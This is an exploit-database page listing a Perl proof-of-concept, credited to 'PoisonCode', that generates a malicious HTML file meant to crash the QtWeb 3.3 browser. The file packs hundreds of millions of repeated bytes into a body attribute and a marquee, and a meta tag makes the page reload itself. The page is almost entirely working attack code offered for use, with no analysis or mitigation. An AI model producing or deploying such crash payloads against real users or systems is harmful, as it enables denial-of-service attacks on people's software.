[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

QtWeb 3.3 Remote DoS / Crash Exploit

Author
PoisonCode
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12534
Category
dos / poc
Date add
03-06-2010
Platform
windows
====================================
QtWeb 3.3 Remote DoS / Crash Exploit
====================================


# Title:QtWeb 3.3 Remote DoS/Crash Exploit
# Software Link:http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable: http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.3
# Platform:Windows
 
 
_____    _____                      _ _        
|  __ \ / ____|                    (_) |       
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/
Exploit
----------------
#!/usr/bin/perl
# File Name :QtWeb 3.3 Remote DoS/Crash Exploit
# Vuln :Remote Dos/Crash
# Author :PoisonCode
# Exploit Title: QtWeb 3.3 Remote DoS/Crash Exploit
# Date:02/06/2010
# Author:PoisonCode
# Site  :http://www.qtweb.net/
# Software Link: http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable:http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.3
# Tested on: Windows
$file="Exploit QtWeb 3.3.html";
print " ======================================\n";
print " = QtWeb 3.3 Remote DoS/Crash Exploit =\n";
print " =        Autor:PoisonCode            =\n";
print " =  Web :PanamaSecurity.blogspot.com  =\n";
print " ======================================\n";
print "\n";
print " Espere Mientras se Genera el Exploit\n";
my $a="\x55" x 100000000;
my $b="\85" x 55900000;
my $c="\x7C\x95\x64\xAE\x00\x96\xbd\x40\x00\x09\8a\86\x5A\x65\x72\x30\x0\x54\x68\x75\x6E\x64\x65\x72";
open(myfile,">>$file");
print myfile "<html>";
print myfile "<title>PanamaSecurity - PoisonCode $c </title>";
print myfile '<head><meta http-equiv="refresh" content="0; url=Exploit QtWeb3.3.html"></head>';
print myfile "<body alink=";
print myfile $a,$b,$c;
print myfile "<marquee>$a,$b,$c</marquee>";
print myfile '">';
print myfile "</html>";
close(myfile);
print "\n";
print " Nombre del Archivo : $file\n";
print " Se Ha Creado El Exploit Correctamente \n";
print "\n";
print "----------------------------------------------------------------------\n";
print " Visiten : PanamaSecurity.blogspot.com\n";



#  0day.today [2024-12-23]  #